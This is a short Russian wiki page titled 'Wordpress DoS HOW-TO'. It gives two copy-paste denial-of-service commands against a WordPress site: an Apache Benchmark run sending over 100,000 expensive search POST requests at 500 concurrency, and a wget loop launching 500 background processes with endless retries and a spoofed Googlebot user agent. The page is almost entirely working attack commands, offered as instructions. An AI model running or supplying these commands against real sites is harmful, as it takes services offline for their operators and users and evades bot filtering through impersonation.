CMS Wordpress

Материал из Chesser Wiki
Перейти к: навигация, поиск

Wordpress DoS HOW-TO

ab - apache benchmark

bash> echo 's=.&orderby=rand'>post.txt
bash> ab -n 100500 -c 500 -p post.txt -T application/x-www-form-urlencoded http://chesser.ru/

wget

bash> for i in {1..500}; do ( \
  wget -O /dev/null --tries=100500 --waitretry=1 --timeout=0.5 \
   --post-data='s=.&orderby=rand' \
   --user-agent='Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' \
   http://chesser.ru/ > /dev/null 2>&1 &); done

моя статья